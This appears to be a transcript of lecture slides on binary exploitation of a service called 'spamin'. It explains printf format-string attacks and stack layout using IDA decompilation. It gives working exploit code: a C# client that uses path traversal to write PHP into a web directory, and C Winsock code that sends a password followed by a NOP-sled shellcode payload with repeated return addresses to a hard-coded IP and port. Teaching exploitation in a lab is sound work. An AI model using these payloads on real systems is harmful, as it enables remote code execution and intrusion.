spamin binary hacking. tools ida + hex rays hexeditor winscp putty telnet visual studio wireshark...
TRANSCRIPT
SPAMIN
Binary Hacking
Tools
• IDA + Hex Rays• hexeditor• WinSCP• Putty• telnet• Visual Studio• Wireshark (Optional)
Do not pirate
• http://www.hex-rays.com/idapro/hallofshame.html
Begin Demo
• SSH into and browse service• netstat –anp• telnet• observe• attempt exploit – optional• reverse engineer• exploit more• patch
printf format string attack
int printf(const char *format, ...);
printf(“%s”, str1);printf(“%s, %x, %x, %x”, str1, x, y, z);
3
“%x %x %x”
1
2
printf(“%x %x %x”,1,2,3);
gets(str1);printf(str1);
%n The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted
C#
TcpClient client = new TcpClient("128.198.60.73", 8008);
StreamWriter streamWriter = new StreamWriter(client.GetStream());
streamWriter.Write("SPAM-IN-SPAM-OUT\n");streamWriter.Write("../public_html/fun.php\n");
streamWriter.Write("<?php phpinfo(); ?>\n");streamWriter.Flush();
format
file contents
filename
512
512
512
0x200
0x200
0x200
0x62C
0xbffff178
…
0xbfffffff
stuff
Gets Shell Code
• http://www.linux-secure.com/endymion/shellcodes/archive/linux-x86-mkdir1.c
NOP
Shell Code
RA
buffer
#include <winsock.h>
int sock; /* Socket descriptor */
struct sockaddr_in mySockAddr; /* server address */
WSADATA wsaData; /* Structure for WinSock setup communication */
if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */
{
fprintf(stderr, "WSAStartup() failed");
exit(1);
}
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
memset(&mySockAddr, 0, sizeof(mySockAddr));
mySockAddr.sin_family = AF_INET;
mySockAddr.sin_addr.s_addr = inet_addr("128.198.60.73");
mySockAddr.sin_port = htons(8008);
connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr));
send(sock,pass,17,0);
C# != C
unsigned __int8 isStringLess; // cf@1 unsigned __int8 isStringEqual; // zf@1 signed int v4; // ecx@1 int spamString2; // edi@1 char *userInput1; // esi@1 int result; // eax@6 char v8; // [sp-10h] [bp-648h]@1 char v9; // [sp+0h] [bp-638h]@1 char *v10; // [sp+Ch] [bp-62Ch]@16 int v11; // [sp+10h] [bp-628h]@1 int spamString1; // [sp+14h] [bp-624h]@1 char *v13; // [sp+18h] [bp-620h]@1 __int16 v14; // [sp+1Ch] [bp-61Ch]@1 char format; // [sp+28h] [bp-610h]@1 char filedata; // [sp+228h] [bp-410h]@12 char filename; // [sp+428h] [bp-210h]@9 int v18; // [sp+628h] [bp-10h]@1 FILE *stream; // [sp+62Ch] [bp-Ch]@1
format
file contents
filename
Other Local Function Variable
Other Local Function Variable
512
512
512
0x200
0x200
0x200
0x62C
Save Register (Prologue) ebp
RA
3
Save Register (Prologue) ebp
Save Registers
0xbffffb10
744
…
0xbfffffff
printf parameters
RAprocess message
main
nopshellcode
RA (repeated)
printf
“%x %x %x”
1
2
printf(“%x %x %x”,1,2,3);
• C# attack• fork -- remote gdbserver• gdb ./spamin PID• x /1000w 0xbfffffff – use offset found in printf
attack
• gdbserver demo
int sock; /* Socket descriptor */
struct sockaddr_in mySockAddr; /* Echo server address */
char *pass = "SPAM-IN-SPAM-OUT\n";
char payload [2500];
WSADATA wsaData; /* Structure for WinSock setup communication */
if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */
{
fprintf(stderr, "WSAStartup() failed");
exit(1);
}
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
memset(&mySockAddr, 0, sizeof(mySockAddr));
mySockAddr.sin_family = AF_INET;
mySockAddr.sin_addr.s_addr = inet_addr("128.198.60.73");
mySockAddr.sin_port = htons(8008);
connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr));
int nopLength = 300;
int length = 700;
memset(payload, '\x90', nopLength); // Create the nop sled in the payload
memcpy(&payload[nopLength],sc,sizeof(sc)); // Copy the shellcode into payload
for (int j=0; j < 1500; j+= 4) // Copy the RA into the payload
{
int r = nopLength + sizeof(sc) -1;
memcpy(&payload[r+j], "\x20\xfb\xff\xbf", 4);
}
payload[length-1] = '\n';
send(sock,pass,17,0);
send(sock, payload, length, 0);
send(sock,pass,17,0);